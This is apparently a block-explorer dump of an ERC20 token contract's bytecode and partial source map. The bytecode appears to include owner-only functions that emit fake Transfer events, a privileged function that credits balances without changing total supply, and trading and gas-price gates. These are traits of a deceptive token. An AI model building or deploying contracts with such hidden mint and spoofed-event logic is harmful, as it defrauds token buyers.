6001019060200180831161060057829003601f168201915b5050505050905090565b5f610633338484611127565b5060015b92915050565b6006546001600160a01b031633148061066057506007546001600160a01b031633145b6106b15760405162461bcd60e51b815260206004820152601f60248201527f4661696c65643a2063616c6c6572206973206e6f7420746865206f776e65720060448201526064015b60405180910390fd5b600780546001600160a01b0319166001600160a01b0392909216919091179055565b5f6106df848484610eba565b6001600160a01b0384165f908152600260209081526040808320338452909152902054828110156107635760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084016106a8565b6107708533858403611127565b506001949350505050565b335f8181526002602090815260408083206001600160a01b038716845290915281205490916106339185906107b19086906117a4565b611127565b6006545f906001600160a01b03163314806107db57506007546001600160a01b031633145b6108275760405162461bcd60e51b815260206004820152601f60248201527f4661696c65643a2063616c6c6572206973206e6f7420746865206f776e65720060448201526064016106a8565b6001600160a01b0383165f908152600160205260408120805484929061084e9084906117a4565b92505081905550826001600160a01b0316846001600160a01b03165f805160206118368339815191528460405161088791815260200190565b60405180910390a35060019392505050565b5f546001600160a01b031633146108c25760405162461bcd60e51b81526004016106a8906117b7565b6001600160a01b03919091165f908152600b60205260409020805460ff1916911515919091179055565b5f546001600160a01b031633146109155760405162461bcd60e51b81526004016106a8906117b7565b5f5b8381101561099f5784848281811061093157610931611744565b905060200201602081019061094691906115e9565b6001600160a01b0316866001600160a01b03165f8051602061183683398151915285858581811061097957610979611744565b9050602002013560405161098f91815260200190565b60405180910390a3600101610917565b505050505050565b5f546001600160a01b031633146109d05760405162461bcd60e51b81526004016106a8906117b7565b6109d95f61124a565b565b5f546001600160a01b03163314610a045760405162461bcd60e51b81526004016106a8906117b7565b5f5b8381101561099f57848482818110610a2057610a20611744565b9050602002016020810190610a3591906115e9565b6001600160a01b0316866001600160a01b03165f80516020611836833981519152858585818110610a6857610a68611744565b90506020020135604051610a7e91815260200190565b60405180910390a3600101610a06565b6060600580546105a690611758565b5f546001600160a01b03163314610ac65760405162461bcd60e51b81526004016106a8906117b7565b5f5b8381101561099f57848482818110610ae257610ae2611744565b9050602002016020810190610af791906115e9565b6001600160a01b0316866001600160a01b03165f80516020611836833981519152858585818110610b2a57610b2a611744565b90506020020135604051610b4091815260200190565b60405180910390a3600101610ac8565b335f9081526002602090815260408083206001600160a01b038616845290915281205482811015610bd15760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016106a8565b610bde3385858403611127565b5060019392505050565b5f610633338484610eba565b5f546001600160a01b03163314610c1d5760405162461bcd60e51b81526004016106a8906117b7565b600a55565b5f546001600160a01b03163314610c4b5760405162461bcd60e51b81526004016106a8906117b7565b600754600160a81b900460ff1615610ca55760405162461bcd60e51b815260206004820152601c60248201527f436f6e74726163743a2054726164696e67206973206f70656e6564210000000060448201526064016106a8565b6007805460ff60a81b1916600160a81b179055565b5f546001600160a01b03163314610ce35760405162461bcd60e51b81526004016106a8906117b7565b5f5b8381101561099f57848482818110610cff57610cff611744565b9050602002016020810190610d1491906115e9565b6001600160a01b0316866001600160a01b03165f80516020611836833981519152858585818110610d4757610d47611744565b90506020020135604051610d5d91815260200190565b60405180910390a3600101610ce5565b5f546001600160a01b03163314610d965760405162461bcd60e51b81526004016106a8906117b7565b5f5b8381101561099f57848482818110610db257610db2611744565b9050602002016020810190610dc791906115e9565b6001600160a01b0316866001600160a01b03165f80516020611836833981519152858585818110610dfa57610dfa611744565b90506020020135604051610e1091815260200190565b60405180910390a3600101610d98565b5f546001600160a01b03163314610e495760405162461bcd60e51b81526004016106a8906117b7565b6001600160a01b038116610eae5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016106a8565b610eb78161124a565b50565b600754600160a01b900460ff161515600114610f185760405162461bcd60e51b815260206004820152601a60248201527f436f6e74726163743a206e6f7420696e697469616c697a65642100000000000060448201526064016106a8565b600754600160a01b900460ff1615156001148015610f405750600754600160a81b900460ff16155b15610fb8575f546001600160a01b0384811691161480610f6c57505f546001600160a01b038381169116145b610fb85760405162461bcd60e51b815260206004820181905260248201527f436f6e74726163743a2074726164696e67206973206e6f74207374617274656460448201526064016106a8565b60085481906001600160a01b031615801590610fe157505f546001600160a01b03858116911614155b8015610ffa57505f546001600160a01b03848116911614155b15611116576008545f906001600160a01b039081169086160361103a57507f00000000000000000000000000000000000000000000000000000000000000005b6008546001600160a01b039081169085160361107e577f0000000000000000000000000000000000000000000000000000000000000000905061107e600a54611299565b6001600160a01b0385165f908152600b602052604090205460ff161515600114806110c557506001600160a01b0384165f908152600b602052604090205460ff1615156001145b156110cd57505f5b8015611114575f6127106110e183866117ec565b6110eb9190611803565b90506110f78185611822565b6009549093506111129087906001600160a01b0316836112a5565b505b505b6111218484836112a5565b50505050565b6001600160a01b0383166111895760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106a8565b6001600160a01b0382166111ea5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106a8565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b803a1115610eb7575f80fd5b6001600160a01b0383166113095760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016106a8565b6001600160a01b03821661136b5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016106a8565b6001600160a01b0383165f90815260016020526040902054818110156113e25760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016106a8565b6001600160a01b038085165f908152600160205260408082208585039055918516815290812080548492906114189084906117a4565b90915550506007546001600160a01b039081169085160361146a576006546040518381526001600160a01b038581169216905f80516020611836833981519152906020015b60405180910390a3611121565b6007546001600160a01b03908116908416036114af576006546040518381526001600160a01b03918216918616905f805160206118368339815191529060200161145d565b826001600160a01b0316846001600160a01b03165f805160206118368339815191528460405161145d91815260200190565b5f8083601f8401126114f1575f80fd5b50813567ffffffffffffffff811115611508575f80fd5b6020830191508360208260051b8501011115611522575f80fd5b9250929050565b5f805f6040848603121561153b575f80fd5b833567ffffffffffffffff811115611551575f80fd5b61155d868287016114e1565b909790965060209590950135949350505050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b03811681146115bc575f80fd5b919050565b5f80604083850312156115d2575f80fd5b6115db836115a6565b946020939093013593505050565b5f602082840312156115f9575f80fd5b611602826115a6565b9392505050565b5f805f6060848603121561161b575f80fd5b611624846115a6565b9250611632602085016115a6565b929592945050506040919091013590565b5f8060408385031215611654575f80fd5b61165d836115a6565b915060208301358015158114611671575f80fd5b809150509250929050565b5f805f805f60608688031215611690575f80fd5b611699866115a6565b9450602086013567ffffffffffffffff8111156116b4575f80fd5b6116c0888289016114e1565b909550935050604086013567ffffffffffffffff8111156116df575f80fd5b6116eb888289016114e1565b969995985093965092949392505050565b5f6020828403121561170c575f80fd5b5035919050565b5f8060408385031215611724575f80fd5b61172d836115a6565b915061173b602084016115a6565b90509250929050565b634e487b7160e01b5f52603260045260245ffd5b600181811c9082168061176c57607f821691505b60208210810361178a57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561063757610637611790565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b808202811582820484141761063757610637611790565b5f8261181d57634e487b7160e01b5f52601260045260245ffd5b500490565b818103818111156106375761063761179056feddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa26469706673582212201748e029f3c6925179fd84ba3a6f7eb32c973e8e7298eb0d6a3e7fd1866f534664736f6c634300081a0033ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef
Deployed Bytecode
0x608060405234801561000f575f80fd5b5060043610610213575f3560e01c8063715018a61161011f578063a9059cbb116100a9578063d632135b11610079578063d632135b146104c8578063dd62ed3e146104db578063f01a4b9914610513578063f2fde38b14610526578063f887ea4014610539575f80fd5b8063a9059cbb14610473578063bf861b3114610486578063c9567bf914610499578063d5abeb01146104a1575f80fd5b806395d89b41116100ef57806395d89b411461043257806396784f751461043a578063985bdfd11461037b578063a457c2d71461044d578063a8aa1b3114610460575f80fd5b8063715018a6146103e557806381744fb1146103ed578063825e7b83146104005780638da5cb5b14610422575f80fd5b80632b14ca56116101a0578063470624021161017057806347062402146103545780634c255c971461037b5780634e148e19146103975780635d822813146103aa57806370a08231146103bd575f80fd5b80632b14ca56146102f8578063313ce5671461031f578063395093511461032e57806343d2e3a314610341575f80fd5b806318160ddd116101e657806318160ddd146102815780631c3c0ea81461029357806323b872dd146102a657806325fa0b98146102b957806327c8f835146102cd575f80fd5b806302b1e95b1461021757806306fdde031461022c578063095ea7b31461024a578063158ef93e1461026d575b5f80fd5b61022a610225366004611529565b61054c565b005b610234610597565b6040516102419190611571565b60405180910390f35b61025d6102583660046115c1565b610627565b6040519015158152602001610241565b60075461025d90600160a01b900460ff1681565b6003545b604051908152602001610241565b61022a6102a13660046115e9565b61063d565b61025d6102b4366004611609565b6106d3565b60075461025d90600160a81b900460ff1681565b6009546102e0906001600160a01b031681565b6040516001600160a01b039091168152602001610241565b6102857f000000000000000000000000000000000000000000000000000000000000000081565b60405160128152602001610241565b61025d61033c3660046115c1565b61077b565b61025d61034f366004611609565b6107b6565b6102857f000000000000000000000000000000000000000000000000000000000000000081565b61038461271081565b60405161ffff9091168152602001610241565b61022a6103a5366004611643565b610899565b61022a6103b836600461167c565b6108ec565b6102856103cb3660046115e9565b6001600160a01b03165f9081526001602052604090205490565b61022a6109a7565b61022a6103fb36600461167c565b6109db565b61025d61040e3660046115e9565b600b6020525f908152604090205460ff1681565b5f546001600160a01b03166102e0565b610234610a8e565b61022a61044836600461167c565b610a9d565b61025d61045b3660046115c1565b610b50565b6008546102e0906001600160a01b031681565b61025d6104813660046115c1565b610be8565b61022a6104943660046116fc565b610bf4565b61022a610c22565b6102857f0000000000000000000000000000000000000001431e0fae6d7217caa000000081565b61022a6104d636600461167c565b610cba565b6102856104e9366004611713565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b61022a61052136600461167c565b610d6d565b61022a6105343660046115e9565b610e20565b600c546102e0906001600160a01b031681565b335f5b83811015610590576105888286868481811061056d5761056d611744565b905060200201602081019061058291906115e9565b85610eba565b60010161054f565b5050505050565b6060600480546105a690611758565b80601f01602080910402602001604051908101604052809291908181526020018280546105d290611758565b801561061d5780601f106105f45761010080835404028352916020019161061d565b820191905f5260205f20905b81548152906001019060200180831161060057829003601f168201915b5050505050905090565b5f610633338484611127565b5060015b92915050565b6006546001600160a01b031633148061066057506007546001600160a01b031633145b6106b15760405162461bcd60e51b815260206004820152601f60248201527f4661696c65643a2063616c6c6572206973206e6f7420746865206f776e65720060448201526064015b60405180910390fd5b600780546001600160a01b0319166001600160a01b0392909216919091179055565b5f6106df848484610eba565b6001600160a01b0384165f908152600260209081526040808320338452909152902054828110156107635760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084016106a8565b6107708533858403611127565b506001949350505050565b335f8181526002602090815260408083206001600160a01b038716845290915281205490916106339185906107b19086906117a4565b611127565b6006545f906001600160a01b03163314806107db57506007546001600160a01b031633145b6108275760405162461bcd60e51b815260206004820152601f60248201527f4661696c65643a2063616c6c6572206973206e6f7420746865206f776e65720060448201526064016106a8565b6001600160a01b0383165f908152600160205260408120805484929061084e9084906117a4565b92505081905550826001600160a01b0316846001600160a01b03165f805160206118368339815191528460405161088791815260200190565b60405180910390a35060019392505050565b5f546001600160a01b031633146108c25760405162461bcd60e51b81526004016106a8906117b7565b6001600160a01b03919091165f908152600b60205260409020805460ff1916911515919091179055565b5f546001600160a01b031633146109155760405162461bcd60e51b81526004016106a8906117b7565b5f5b8381101561099f5784848281811061093157610931611744565b905060200201602081019061094691906115e9565b6001600160a01b0316866001600160a01b03165f8051602061183683398151915285858581811061097957610979611744565b9050602002013560405161098f91815260200190565b60405180910390a3600101610917565b505050505050565b5f546001600160a01b031633146109d05760405162461bcd60e51b81526004016106a8906117b7565b6109d95f61124a565b565b5f546001600160a01b03163314610a045760405162461bcd60e51b81526004016106a8906117b7565b5f5b8381101561099f57848482818110610a2057610a20611744565b9050602002016020810190610a3591906115e9565b6001600160a01b0316866001600160a01b03165f80516020611836833981519152858585818110610a6857610a68611744565b90506020020135604051610a7e91815260200190565b60405180910390a3600101610a06565b6060600580546105a690611758565b5f546001600160a01b03163314610ac65760405162461bcd60e51b81526004016106a8906117b7565b5f5b8381101561099f57848482818110610ae257610ae2611744565b9050602002016020810190610af791906115e9565b6001600160a01b0316866001600160a01b03165f80516020611836833981519152858585818110610b2a57610b2a611744565b90506020020135604051610b4091815260200190565b60405180910390a3600101610ac8565b335f9081526002602090815260408083206001600160a01b038616845290915281205482811015610bd15760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016106a8565b610bde3385858403611127565b5060019392505050565b5f610633338484610eba565b5f546001600160a01b03163314610c1d5760405162461bcd60e51b81526004016106a8906117b7565b600a55565b5f546001600160a01b03163314610c4b5760405162461bcd60e51b81526004016106a8906117b7565b600754600160a81b900460ff1615610ca55760405162461bcd60e51b815260206004820152601c60248201527f436f6e74726163743a2054726164696e67206973206f70656e6564210000000060448201526064016106a8565b6007805460ff60a81b1916600160a81b179055565b5f546001600160a01b03163314610ce35760405162461bcd60e51b81526004016106a8906117b7565b5f5b8381101561099f57848482818110610cff57610cff611744565b9050602002016020810190610d1491906115e9565b6001600160a01b0316866001600160a01b03165f80516020611836833981519152858585818110610d4757610d47611744565b90506020020135604051610d5d91815260200190565b60405180910390a3600101610ce5565b5f546001600160a01b03163314610d965760405162461bcd60e51b81526004016106a8906117b7565b5f5b8381101561099f57848482818110610db257610db2611744565b9050602002016020810190610dc791906115e9565b6001600160a01b0316866001600160a01b03165f80516020611836833981519152858585818110610dfa57610dfa611744565b90506020020135604051610e1091815260200190565b60405180910390a3600101610d98565b5f546001600160a01b03163314610e495760405162461bcd60e51b81526004016106a8906117b7565b6001600160a01b038116610eae5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016106a8565b610eb78161124a565b50565b600754600160a01b900460ff161515600114610f185760405162461bcd60e51b815260206004820152601a60248201527f436f6e74726163743a206e6f7420696e697469616c697a65642100000000000060448201526064016106a8565b600754600160a01b900460ff1615156001148015610f405750600754600160a81b900460ff16155b15610fb8575f546001600160a01b0384811691161480610f6c57505f546001600160a01b038381169116145b610fb85760405162461bcd60e51b815260206004820181905260248201527f436f6e74726163743a2074726164696e67206973206e6f74207374617274656460448201526064016106a8565b60085481906001600160a01b031615801590610fe157505f546001600160a01b03858116911614155b8015610ffa57505f546001600160a01b03848116911614155b15611116576008545f906001600160a01b039081169086160361103a57507f00000000000000000000000000000000000000000000000000000000000000005b6008546001600160a01b039081169085160361107e577f0000000000000000000000000000000000000000000000000000000000000000905061107e600a54611299565b6001600160a01b0385165f908152600b602052604090205460ff161515600114806110c557506001600160a01b0384165f908152600b602052604090205460ff1615156001145b156110cd57505f5b8015611114575f6127106110e183866117ec565b6110eb9190611803565b90506110f78185611822565b6009549093506111129087906001600160a01b0316836112a5565b505b505b6111218484836112a5565b50505050565b6001600160a01b0383166111895760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106a8565b6001600160a01b0382166111ea5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106a8565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b803a1115610eb7575f80fd5b6001600160a01b0383166113095760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016106a8565b6001600160a01b03821661136b5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016106a8565b6001600160a01b0383165f90815260016020526040902054818110156113e25760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016106a8565b6001600160a01b038085165f908152600160205260408082208585039055918516815290812080548492906114189084906117a4565b90915550506007546001600160a01b039081169085160361146a576006546040518381526001600160a01b038581169216905f80516020611836833981519152906020015b60405180910390a3611121565b6007546001600160a01b03908116908416036114af576006546040518381526001600160a01b03918216918616905f805160206118368339815191529060200161145d565b826001600160a01b0316846001600160a01b03165f805160206118368339815191528460405161145d91815260200190565b5f8083601f8401126114f1575f80fd5b50813567ffffffffffffffff811115611508575f80fd5b6020830191508360208260051b8501011115611522575f80fd5b9250929050565b5f805f6040848603121561153b575f80fd5b833567ffffffffffffffff811115611551575f80fd5b61155d868287016114e1565b909790965060209590950135949350505050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b80356001600160a01b03811681146115bc575f80fd5b919050565b5f80604083850312156115d2575f80fd5b6115db836115a6565b946020939093013593505050565b5f602082840312156115f9575f80fd5b611602826115a6565b9392505050565b5f805f6060848603121561161b575f80fd5b611624846115a6565b9250611632602085016115a6565b929592945050506040919091013590565b5f8060408385031215611654575f80fd5b61165d836115a6565b915060208301358015158114611671575f80fd5b809150509250929050565b5f805f805f60608688031215611690575f80fd5b611699866115a6565b9450602086013567ffffffffffffffff8111156116b4575f80fd5b6116c0888289016114e1565b909550935050604086013567ffffffffffffffff8111156116df575f80fd5b6116eb888289016114e1565b969995985093965092949392505050565b5f6020828403121561170c575f80fd5b5035919050565b5f8060408385031215611724575f80fd5b61172d836115a6565b915061173b602084016115a6565b90509250929050565b634e487b7160e01b5f52603260045260245ffd5b600181811c9082168061176c57607f821691505b60208210810361178a57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561063757610637611790565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b808202811582820484141761063757610637611790565b5f8261181d57634e487b7160e01b5f52601260045260245ffd5b500490565b818103818111156106375761063761179056feddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa26469706673582212201748e029f3c6925179fd84ba3a6f7eb32c973e8e7298eb0d6a3e7fd1866f534664736f6c634300081a0033
Deployed Bytecode Sourcemap
10424:4947:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12246:272;;;;;;:::i;:::-;;:::i;:::-;;3900:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5005:194;;;;;;:::i;:::-;;:::i;:::-;;;2013:14:1;;2006:22;1988:41;;1976:2;1961:18;5005:194:0;1848:187:1;10648:31:0;;;;;-1:-1:-1;;;10648:31:0;;;;;;4221:108;4309:12;;4221:108;;;2186:25:1;;;2174:2;2159:18;4221:108:0;2040:177:1;3792:100:0;;;;;;:::i;:::-;;:::i;5207:529::-;;;;;;:::i;:::-;;:::i;10686:29::-;;;;;-1:-1:-1;;;10686:29:0;;;;;;10761:71;;;;;-1:-1:-1;;;;;10761:71:0;;;;;;-1:-1:-1;;;;;2956:32:1;;;2938:51;;2926:2;2911:18;10761:71:0;2792:203:1;10883:36:0;;;;;4120:93;;;4203:2;3142:36:1;;3130:2;3115:18;4120:93:0;3000:184:1;5746:290:0;;;;;;:::i;:::-;;:::i;7531:273::-;;;;;;:::i;:::-;;:::i;10841:35::-;;;;;10594:45;;10634:5;10594:45;;;;;3363:6:1;3351:19;;;3333:38;;3321:2;3306:18;10594:45:0;3189:188:1;11955:128:0;;;;;;:::i;:::-;;:::i;13113:282::-;;;;;;:::i;:::-;;:::i;4337:143::-;;;;;;:::i;:::-;-1:-1:-1;;;;;4454:18:0;4427:7;4454:18;;;:9;:18;;;;;;;4337:143;1357:103;;;:::i;12820:285::-;;;;;;:::i;:::-;;:::i;10967:44::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;1135:87;1181:7;1208:6;-1:-1:-1;;;;;1208:6:0;1135:87;;4008:104;;;:::i;12526:286::-;;;;;;:::i;:::-;;:::i;6044:475::-;;;;;;:::i;:::-;;:::i;10722:32::-;;;;;-1:-1:-1;;;;;10722:32:0;;;4488:200;;;;;;:::i;:::-;;:::i;11791:156::-;;;;;;:::i;:::-;;:::i;12091:147::-;;;:::i;10465:73::-;;;;;13707:282;;;;;;:::i;:::-;;:::i;4696:176::-;;;;;;:::i;:::-;-1:-1:-1;;;;;4837:18:0;;;4810:7;4837:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;4696:176;13403:296;;;;;;:::i;:::-;;:::i;1468:238::-;;;;;;:::i;:::-;;:::i;11131:32::-;;;;;-1:-1:-1;;;;;11131:32:0;;;12246:272;703:10;12358:13;12397:114;12417:21;;;12397:114;;;12460:39;12470:5;12477:10;;12488:1;12477:13;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;12492:6;12460:9;:39::i;:::-;12440:3;;12397:114;;;;12347:171;12246:272;;;:::o;3900:100::-;3954:13;3987:5;3980:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3900:100;:::o;5005:194::-;5113:4;5130:39;703:10;5153:7;5162:6;5130:8;:39::i;:::-;-1:-1:-1;5187:4:0;5005:194;;;;;:::o;3792:100::-;3527:9;;-1:-1:-1;;;;;3527:9:0;3540:10;3527:23;;:50;;-1:-1:-1;3554:9:0;;-1:-1:-1;;;;;3554:9:0;3567:10;3554:23;3527:50;3518:96;;;;-1:-1:-1;;;3518:96:0;;6031:2:1;3518:96:0;;;6013:21:1;6070:2;6050:18;;;6043:30;6109:33;6089:18;;;6082:61;6160:18;;3518:96:0;;;;;;;;;3863:9:::1;:21:::0;;-1:-1:-1;;;;;;3863:21:0::1;-1:-1:-1::0;;;;;3863:21:0;;;::::1;::::0;;;::::1;::::0;;3792:100::o;5207:529::-;5347:4;5364:36;5374:6;5382:9;5393:6;5364:9;:36::i;:::-;-1:-1:-1;;;;;5440:19:0;;5413:24;5440:19;;;:11;:19;;;;;;;;703:10;5440:33;;;;;;;;5506:26;;;;5484:116;;;;-1:-1:-1;;;5484:116:0;;6391:2:1;5484:116:0;;;6373:21:1;6430:2;6410:18;;;6403:30;6469:34;6449:18;;;6442:62;-1:-1:-1;;;6520:18:1;;;6513:38;6568:19;;5484:116:0;6189:404:1;5484:116:0;5636:57;5645:6;703:10;5686:6;5667:16;:25;5636:8;:57::i;:::-;-1:-1:-1;5724:4:0;;5207:529;-1:-1:-1;;;;5207:529:0:o;5746:290::-;703:10;5859:4;5948:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;5948:34:0;;;;;;;;;;5859:4;;5876:130;;5926:7;;5948:47;;5985:10;;5948:47;:::i;:::-;5876:8;:130::i;7531:273::-;3527:9;;7669:4;;-1:-1:-1;;;;;3527:9:0;3540:10;3527:23;;:50;;-1:-1:-1;3554:9:0;;-1:-1:-1;;;;;3554:9:0;3567:10;3554:23;3527:50;3518:96;;;;-1:-1:-1;;;3518:96:0;;6031:2:1;3518:96:0;;;6013:21:1;6070:2;6050:18;;;6043:30;6109:33;6089:18;;;6082:61;6160:18;;3518:96:0;5829:355:1;3518:96:0;-1:-1:-1;;;;;7693:20:0;::::1;;::::0;;;:9:::1;:20;::::0;;;;:30;;7717:6;;7693:20;:30:::1;::::0;7717:6;;7693:30:::1;:::i;:::-;;;;;;;;7756:9;-1:-1:-1::0;;;;;7739:35:0::1;7748:6;-1:-1:-1::0;;;;;7739:35:0::1;-1:-1:-1::0;;;;;;;;;;;7767:6:0::1;7739:35;;;;2186:25:1::0;;2174:2;2159:18;;2040:177;7739:35:0::1;;;;;;;;-1:-1:-1::0;7792:4:0::1;7531:273:::0;;;;;:::o;11955:128::-;1270:6;;-1:-1:-1;;;;;1270:6:0;703:10;1270:22;1262:67;;;;-1:-1:-1;;;1262:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;12040:22:0;;;::::1;;::::0;;;:12:::1;:22;::::0;;;;:35;;-1:-1:-1;;12040:35:0::1;::::0;::::1;;::::0;;;::::1;::::0;;11955:128::o;13113:282::-;1270:6;;-1:-1:-1;;;;;1270:6:0;703:10;1270:22;1262:67;;;;-1:-1:-1;;;1262:67:0;;;;;;;:::i;:::-;13273:9:::1;13268:120;13288:19:::0;;::::1;13268:120;;;13352:8;;13361:1;13352:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;13334:42:0::1;13343:7;-1:-1:-1::0;;;;;13334:42:0::1;-1:-1:-1::0;;;;;;;;;;;13365:7:0::1;;13373:1;13365:10;;;;;;;:::i;:::-;;;;;;;13334:42;;;;2186:25:1::0;;2174:2;2159:18;;2040:177;13334:42:0::1;;;;;;;;13309:3;;13268:120;;;;13113:282:::0;;;;;:::o;1357:103::-;1270:6;;-1:-1:-1;;;;;1270:6:0;703:10;1270:22;1262:67;;;;-1:-1:-1;;;1262:67:0;;;;;;;:::i;:::-;1422:30:::1;1449:1;1422:18;:30::i;:::-;1357:103::o:0;12820:285::-;1270:6;;-1:-1:-1;;;;;1270:6:0;703:10;1270:22;1262:67;;;;-1:-1:-1;;;1262:67:0;;;;;;;:::i;:::-;12983:9:::1;12978:120;12998:19:::0;;::::1;12978:120;;;13062:8;;13071:1;13062:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;13044:42:0::1;13053:7;-1:-1:-1::0;;;;;13044:42:0::1;-1:-1:-1::0;;;;;;;;;;;13075:7:0::1;;13083:1;13075:10;;;;;;;:::i;:::-;;;;;;;13044:42;;;;2186:25:1::0;;2174:2;2159:18;;2040:177;13044:42:0::1;;;;;;;;13019:3;;12978:120;;4008:104:::0;4064:13;4097:7;4090:14;;;;;:::i;12526:286::-;1270:6;;-1:-1:-1;;;;;1270:6:0;703:10;1270:22;1262:67;;;;-1:-1:-1;;;1262:67:0;;;;;;;:::i;:::-;12690:9:::1;12685:120;12705:19:::0;;::::1;12685:120;;;12769:8;;12778:1;12769:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;12751:42:0::1;12760:7;-1:-1:-1::0;;;;;12751:42:0::1;-1:-1:-1::0;;;;;;;;;;;12782:7:0::1;;12790:1;12782:10;;;;;;;:::i;:::-;;;;;;;12751:42;;;;2186:25:1::0;;2174:2;2159:18;;2040:177;12751:42:0::1;;;;;;;;12726:3;;12685:120;;6044:475:::0;703:10;6162:4;6206:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;6206:34:0;;;;;;;;;;6273:35;;;;6251:122;;;;-1:-1:-1;;;6251:122:0;;7423:2:1;6251:122:0;;;7405:21:1;7462:2;7442:18;;;7435:30;7501:34;7481:18;;;7474:62;-1:-1:-1;;;7552:18:1;;;7545:35;7597:19;;6251:122:0;7221:401:1;6251:122:0;6409:67;703:10;6432:7;6460:15;6441:16;:34;6409:8;:67::i;:::-;-1:-1:-1;6507:4:0;;6044:475;-1:-1:-1;;;6044:475:0:o;4488:200::-;4599:4;4616:42;703:10;4640:9;4651:6;4616:9;:42::i;11791:156::-;1270:6;;-1:-1:-1;;;;;1270:6:0;703:10;1270:22;1262:67;;;;-1:-1:-1;;;1262:67:0;;;;;;;:::i;:::-;11895:20:::1;:44:::0;11791:156::o;12091:147::-;1270:6;;-1:-1:-1;;;;;1270:6:0;703:10;1270:22;1262:67;;;;-1:-1:-1;;;1262:67:0;;;;;;;:::i;:::-;12152:9:::1;::::0;-1:-1:-1;;;12152:9:0;::::1;;;:18;12144:59;;;::::0;-1:-1:-1;;;12144:59:0;;7829:2:1;12144:59:0::1;::::0;::::1;7811:21:1::0;7868:2;7848:18;;;7841:30;7907;7887:18;;;7880:58;7955:18;;12144:59:0::1;7627:352:1::0;12144:59:0::1;12214:9;:16:::0;;-1:-1:-1;;;;12214:16:0::1;-1:-1:-1: